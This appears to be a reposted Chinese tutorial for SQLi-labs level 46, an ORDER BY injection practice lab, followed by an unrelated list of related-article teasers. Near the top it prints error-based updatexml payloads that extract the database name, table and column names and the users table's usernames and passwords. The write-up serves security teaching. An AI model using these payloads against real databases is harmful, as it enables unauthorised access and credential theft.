sqllabs第46关 order by 注入

sqllabs第46关 order by 注入

news/2025/10/31 14:10:46/文章来源:https://blog.csdn.net/weixin_71398630/article/details/136220666

简介：（order by注入-错误回显-POST注入）

请求方法：POST

方法：order by注入+错误回显+数字型注入

先了解下 order by参数注入：

order by 注入是指其后面的参数是可控的，

order by 不同于我们在 where 后的注入点，不能使用 union 等注入，其后可以跟接报错注入或者时间盲注。

判断库名：
?sort=-1 and updatexml(1,concat(0x7e,database(),0x7e),1)
判断表名：
?sort=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)
判断字段名：
?sort=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)
查询数据：
?sort=1 and updatexml(1,concat(0x7e,(select group_concat(username,password) from security.users),0x7e),1)

1.第四十六关可以看到提示： Please input parameter as SORT with numeric value

用数字形式输入sort排序参数

2.尝试加上' 看看是否存在报错注入。

数字型order by注入时,语句order by=2 and 1=2,和order by=2 and 1=1显示的结果一样,所以无法用来判断注入点类型

而用rand()会显示不同的排序结果

当在字符型中用?sort=rand(),则不会有效果,排序不会改变

因此用rand()可判断注入点类型

3.判断字段数发现到第四个回显时报错，说明只有三个字段,当我们使用 sort=1 时表格以第一列进行排列，sort=2 时表格以第二列进行排列， sort=3 时表格以第三列进行排序。

4.库名、表名、字段、数据：

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/695034.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

gem5学习（23）：经典缓存——Classic Caches

gem5学习（23）：经典缓存——Classic Caches

目录一、Interconnects 1、Crossbars 二、Debugging 官网教程：gem5: Classic caches 默认缓存是一个带有MSHR（未命中状态保持寄存器）和WB（写缓冲区）的非阻塞缓存，用于读取和写入未命中。缓存还可以启用…

阅读更多...

6.3 存储卡

6.3 存储卡

本节介绍Android的文件存储方式--在存储卡上读写文件，包括：公有存储空间与私有存储空间有什么区别，如何利用存储卡读写文本文件，如何利用存储卡读写图片文件，如何在App运行的时候动态申请权限等。 6.3.1 私有存储空间…

阅读更多...

Android应用图标防止被系统缩放问题

Android应用图标防止被系统缩放问题

问题 Launcher显示应用的图标时可能有一定程度的缩放和剪裁后剧中，可能导致我们应用的图标看起来过小。解决方法在icon资源中用xml去放置资源ic_launcher.xml，不要直接使用png，然后把自己的资源放在xml中的foreground 标签中。 <appli…

阅读更多...

关于Linux搭建DedeCMS说明

关于Linux搭建DedeCMS说明

使用环境 1. Ubuntu 22.042. PhP 4.0 3. nginx4. MySQL 5.7软件安装安装nginx #1. 更新系统 sudo apt update && sudo apt upgrade -y#2. 安装nginx sudo apt install nginx -y安装MySQL apt list -a mysql-server安装 PHP 7.4 使用 ondrej/php PPA sudo apt inst…

阅读更多...

[java基础揉碎]this

[java基础揉碎]this

引出this: 什么是this: java虚拟机会给每个对象分配 this，代表当前对象。这里的this就是new出来的这个对象 this的本质: this是个引用在堆中指向它自己: this的细节: 访问成员方法: 访问构造器:

阅读更多...

精英ECS Z97-MACHINE V1.0 BIOS MX25L6406E

精英ECS Z97-MACHINE V1.0 BIOS MX25L6406E

官网上的两个BIOS我都无法亮机，这是我保存出来的BIOS，不知道是否能使用五代的处理器官网：Z97-MACHINE｜Motherboard｜产品｜ECS 精英电脑国外老哥的看法：ECS Z97-MACHINE Closer Look: The BIO…

阅读更多...

Postgresql源码（121）事务状态中childXids的作用

Postgresql源码（121）事务状态中childXids的作用

总结 PG的子事务回滚是真回滚（直接回滚了，不管顶层事务提交还是回滚）。 PG的子事务提交是假提交（子事务提交后会把决定权交给顶层事务，随顶层事务提交、回滚）。子事务提交后，将xid记录到父事…

阅读更多...

RocketMQ-架构与设计

RocketMQ-架构与设计

RocketMQ架构与设计一、简介二、框架概述1.设计特点三、架构图1.Producer2.Consumer3.NameServer4.BrokerServer 四、基本特性1.消息顺序性1.1 全局顺序1.2 分区顺序 2.消息回溯3.消息重投4.消息重试5.延迟队列（定时消息）6.重试队列7.死信队列8.消息语…

阅读更多...

【电子书】游戏开发

【电子书】游戏开发

资料 wx：1945423050 整理了一些互联网电子书，推荐给大家游戏开发 ADOBE FLASH PROFESSIONAL CS6 标准培训教材.epubAndroid 3D 游戏案例开发大全.epubCocos Creator游戏开发实战.epubCocos2D-X游戏开发技术精解.epubCocos2d-JS游戏开发快速入门到实战…

阅读更多...

《Python 语音转换简易速速上手小册》第3章文本到语音的转换（2024 最新版）

《Python 语音转换简易速速上手小册》第3章文本到语音的转换（2024 最新版）

文章目录 3.1 文本到语音的原理3.1.1 基础知识3.1.2 主要案例：自动新闻播报器案例介绍案例 Demo案例分析 3.1.3 扩展案例 1：智能助手案例介绍案例 Demo案例分析 3.1.4 扩展案例 2：电子书阅读器案例介绍案例 Demo案例分析 3.2 Python 中的文本…

阅读更多...

[高并发] - 2. 金融交易系统高并发架构

[高并发] - 2. 金融交易系统高并发架构

1. 高并发场景 [高并发] - 1. 高并发架构综述上面文章提到的数据都存在高并发场景。 2. 解决方案 2.1 权限权限数据的特点是数据量少（一千万），占用的空间大小大概在2G左右，但是性能要求极高。权限数据还有个特点，…

阅读更多...

python 验证AES_ECB算法对数据的加解密

python 验证AES_ECB算法对数据的加解密

目录一、python 代码实现如下： 二、代码解析三、运行结果一、python 代码实现如下： #AES_ECB模式实现 from Crypto.Cipher import AES from Crypto.Random import get_random_bytes # 自动生成密钥 from Crypto.Util.Padding import pad, unpad …

阅读更多...

开开开开开，干

开开开开开，干

大家新年快乐，开工啦啦啦啦其实每天很多人都会问： 有协同过滤的算法吗，有的，可以给你解释原理… 有的小伙伴只开了一部分逻辑，我要实现用户可以下单功能但是细细考虑下单，需要现有用户，维护…

阅读更多...

为全志D1开发板移植LVGL日历控件和显示天气

为全志D1开发板移植LVGL日历控件和显示天气

利用TCP封装HTTP包请求天气信息 Linux还真是逐步熟悉中，现在才了解到Linux即没有原生的GUI，也没有应用层协议栈，所以要实现HTTP应用，必须利用TCP然后自己封装HTTP数据包。本篇即记录封装HTTP数据包，到心知天气请求天气…

阅读更多...

Flutter Slider自定义滑块样式 Slider的label标签框常显示

Flutter Slider自定义滑块样式 Slider的label标签框常显示

1、自定义Slider滑块样式 Flutter Slider控件的滑块系统样式是一个圆点，thumbShape默认样式是RoundSliderThumbShape，如果想要使用其它的样式就需要自定义一下thumbShape； 例如需要一个上图样式的（圆点半透明圆形边框&#xff09…

阅读更多...

2024年天津高考数学备考：历年选择题真题练一练（2014~2023）

2024年天津高考数学备考：历年选择题真题练一练（2014~2023）

距离2024年高考还有不到四个月的时间，今天我们来看一下2014~2023年的天津市高考数学的选择题，从过去十年的真题中随机抽取5道题，并且提供解析。后附六分成长独家制作的在线练习集，科学、高效地反复刷这些真题，吃透真题…

阅读更多...

ELK入门(四)-logstash

ELK入门(四)-logstash

Logstash Logstash 是开源的服务器端数据处理管道，能够同时从多个来源采集数据，转换数据，然后将数据发送到您最喜欢的存储库中。 Logstash 能够动态地采集、转换和传输数据，不受格式或复杂度的影响。利用 Grok 从非结构化数据中…

阅读更多...

打造纯Lua组件化开发模式：Unity xLua框架详解

打造纯Lua组件化开发模式：Unity xLua框架详解

在传统的Unity开发中，通常会使用C#来编写游戏逻辑和组件。但是，随着Lua在游戏开发中的应用越来越广泛，我们可以将游戏逻辑和组件完全用Lua来实现，实现纯Lua的组件化开发模式。这样做的好处是可以更加灵活地修改游戏逻辑&#xff0…

阅读更多...

uni-app 开发调试自动打开手机屏幕大小界面（Aidex移动端开发项目）

uni-app 开发调试自动打开手机屏幕大小界面（Aidex移动端开发项目）

上效果： 下载Aidex的移动端项目并打开： 若依-ruoyi-AiDex-Uniapp: 若依-Ruoyi APP 移动解决方案，基于uniappuView封装的一套基础模版，开箱即用，免费开源，一份代码多终端适配，支持H5、支付宝小程…

阅读更多...

RedisDesktopManager无法远程连接到Linux虚拟机中Redis的docker容器的一种解决方案

RedisDesktopManager无法远程连接到Linux虚拟机中Redis的docker容器的一种解决方案

1.问题描述除了RedisDesktopManager以外，使用java代码也无法连接到centos7虚拟机中的docker容器中的Redis ，按照网上其他博主的解决方案，在排除Linux防火墙问题，端口映射问题，redis.conf配置文件问题以后&#xff0c…

阅读更多...

最新文章